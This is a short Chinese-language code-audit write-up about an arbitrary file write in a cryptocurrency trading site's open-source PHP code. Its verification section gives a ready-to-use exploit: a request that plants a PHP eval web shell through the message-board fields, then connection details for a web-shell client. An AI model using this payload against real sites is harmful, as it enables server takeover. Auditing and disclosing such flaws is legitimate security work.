0x0 前言:

没事闲得慌就想在gayhub搜点php源码审一审,搜到一个虚拟币平台的源码。

源码奉上: https://github.com/maole01/otc

0x1 整理思路:

一般来说这种站都是挖的SQL注入之类的,如果用的是TP框架的话 也可以看看日志文件路径。不过这次挖到的是一个任意文件写入,可以直接getshell。

为了祖国繁荣富强,紧跟党走,打击非法集资,非法运营,传销骗钱…emmmmm

0x2 漏洞描述 :

首先祭起法师大大的源代码审计工具,正则匹配来一波,发现有个文件有点问题

打开一看 果然有点问题

首先呢,是通过GET传递过来数据 后面呢定义一个数组 把数据加到里面 接着呢就是定义一下路径 以及 文件名。

这个地方就写出来了,把获取到的数据保存起来(简直写的像一个后门)

0x2 漏洞验证:

本地验证

先访问:/gw/3/MessageBoard.php?type=123&name=123&email=123@qq.com&subject=123123&message="}]<?php @eval($_POST['x']);?>//123

后访问:/gw/3/saveMessageBoardData.php

用蚁剑连接 密码 x